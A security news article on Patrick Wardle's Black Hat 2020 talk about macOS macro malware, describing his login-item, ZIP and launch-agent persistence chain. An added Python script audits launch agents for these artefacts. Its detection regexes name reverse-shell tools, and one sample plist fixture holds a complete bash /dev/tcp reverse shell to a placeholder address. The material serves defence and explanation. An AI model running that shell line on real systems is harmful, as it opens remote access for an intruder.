Cyber security news for all


    Significant increase in attacks with macOS-specific macro malware

    Security researcher Patrick Wardle has observed a significant increase in attacks with macOS-specific macro malware. As he explained in his talk on Wednesday at the Black Hat 2020 conference, Macs are becoming an increasingly popular target because they are in ever wider use, especially in the business sector, for example at young start-ups.

    Users Are Much Less Aware Of The Dangers

    Attacks with prepared Word documents are old hat on Windows systems. Most users have internalized the typical rules of conduct for protecting against malicious macro code: they treat e-mail attachments with suspicion and, as far as possible, refrain from enabling and using macros in Office. On macOS, macro malware has hardly been an issue so far, and users are much less aware of the possible dangers.


    Self Developed Attack Strategy

    To illustrate the risk, the researcher presented a self-developed attack chain that minimizes the required user interaction and even bypasses macOS protection mechanisms. Wardle's technique no longer poses an acute danger to users who keep their systems updated: in the form described, it should no longer work on systems running the current Office and macOS versions since last year. Nevertheless, it demonstrates the basic attack options very clearly.

    The malicious macro code can only run if the user clicks on "Enable". As further limitations on previous malware, he named the sandbox in which Microsoft Office runs on macOS, as well as the app notarization mechanism, which can sometimes prevent malicious code from executing even after a sandbox escape.

    Wardle's macro code creates a login item, which is executed automatically when the user logs in, now outside the context of the sandbox. He solved the remaining problem, notarization together with the quarantine mechanism, quite creatively: instead of an executable, he placed a ZIP archive as the login item. At login, Archive Utility, the default handler for ZIP files, unpacked it, and the extracted content created a launch agent that could then start a reverse shell without triggering the security mechanisms.
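The chain described above leaves two artefacts a defender can look for: a login item that is not an application bundle (such as a ZIP archive handed to Archive Utility), and a launch agent plist in the user's LaunchAgents directory that runs a payload from a user-writable location or contains an inline reverse shell. The following audit script is an added example written for this article; it is not Patrick Wardle's tooling and not code from the original page. The trusted-directory list, the reverse-shell patterns, the user name "alice", the address 192.0.2.10 and the three sample plists are assumptions constructed for the example.

```python
"""Audit launch agent plists and login items for the persistence artefacts above.

Added example, not Patrick Wardle's tooling or code from the original article.
TRUSTED_PREFIXES, REVERSE_SHELL_PATTERNS and the sample plists are assumptions.
"""
import os
import plistlib
import re
import tempfile

# Assumption: a benign launch agent's program normally lives under one of these.
TRUSTED_PREFIXES = ("/System/", "/usr/bin/", "/usr/sbin/", "/usr/libexec/",
                    "/bin/", "/sbin/", "/Applications/", "/Library/")

# Assumption: common shapes of an inline reverse shell; a heuristic, not a complete list.
REVERSE_SHELL_PATTERNS = [
    re.compile(r"/dev/tcp/"),
    re.compile(r"\bnc\b.*\s-e\s"),
    re.compile(r"\bbash\s+-i\b"),
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
    re.compile(r"\bpython[23]?\b.*\bsocket\b"),
]


def inspect_launch_agent(plist_bytes: bytes, filename: str = "<memory>") -> dict:
    """Parse one launchd plist and report what it runs plus any suspicion reasons."""
    try:
        plist = plistlib.loads(plist_bytes)
    except Exception:  # plistlib raises several types for malformed input
        return {"file": filename, "label": None, "program": "", "run_at_load": False,
                "reasons": ["plist could not be parsed"], "suspicious": True}

    # launchd runs Program (if set) with ProgramArguments as argv; join both for matching.
    parts = []
    if plist.get("Program"):
        parts.append(str(plist["Program"]))
    parts.extend(str(a) for a in plist.get("ProgramArguments", []))
    program = parts[0] if parts else ""
    command_line = " ".join(parts)

    reasons = []
    if not parts:
        reasons.append("no Program or ProgramArguments")
    if program and not program.startswith(TRUSTED_PREFIXES):
        reasons.append(f"program outside trusted directories: {program}")
    if any(p.search(command_line) for p in REVERSE_SHELL_PATTERNS):
        reasons.append("reverse shell pattern in ProgramArguments")

    return {"file": filename, "label": plist.get("Label"), "program": program,
            "run_at_load": bool(plist.get("RunAtLoad")), "reasons": reasons,
            "suspicious": bool(reasons)}


def scan_launch_agents(directory: str) -> list:
    """Inspect every .plist in a LaunchAgents directory (e.g. ~/Library/LaunchAgents)."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            path = os.path.join(directory, name)
            with open(path, "rb") as fh:
                findings.append(inspect_launch_agent(fh.read(), path))
    return findings


def flag_login_items(paths) -> list:
    """Return login items that are not .app bundles; a ZIP or script registered as a
    login item is opened by its default handler at login, the trick described above."""
    return [p for p in paths if not p.rstrip("/").endswith(".app")]


# Constructed samples: an inline reverse shell, a script dropped into the user's Library
# (the shape an unpacked archive would leave behind), and a benign backup job.
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string><string>-c</string>
    <string>bash -i >&amp; /dev/tcp/192.0.2.10/4444 0>&amp;1</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

UNPACKED_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key><array>
    <string>/Users/alice/Library/Application Support/.cache/agent.sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key><array>
    <string>/usr/bin/rsync</string><string>-a</string>
    <string>/Users/alice/Documents</string><string>/Volumes/Backup/</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

SAMPLE_PLISTS = {"com.example.updater.plist": SUSPICIOUS_PLIST,
                 "com.example.helper.plist": UNPACKED_PLIST,
                 "com.example.backup.plist": BENIGN_PLIST}


def demo() -> list:
    """Write the constructed samples to a temporary LaunchAgents directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in SAMPLE_PLISTS.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(data)
        return scan_launch_agents(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding["label"], "SUSPICIOUS" if finding["suspicious"] else "ok", finding["reasons"])
    print(flag_login_items(["/Applications/Slack.app", "/Users/alice/Library/.payload.zip"]))
```

On a real Mac, point `scan_launch_agents` at `os.path.expanduser("~/Library/LaunchAgents")`, and feed `flag_login_items` the output of `osascript -e 'tell application "System Events" to get the path of every login item'`. The checks are heuristics: a payload that hides behind a trusted interpreter path with an obfuscated argument will pass the path test, so treat a hit as a reason to look, not as proof of compromise.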
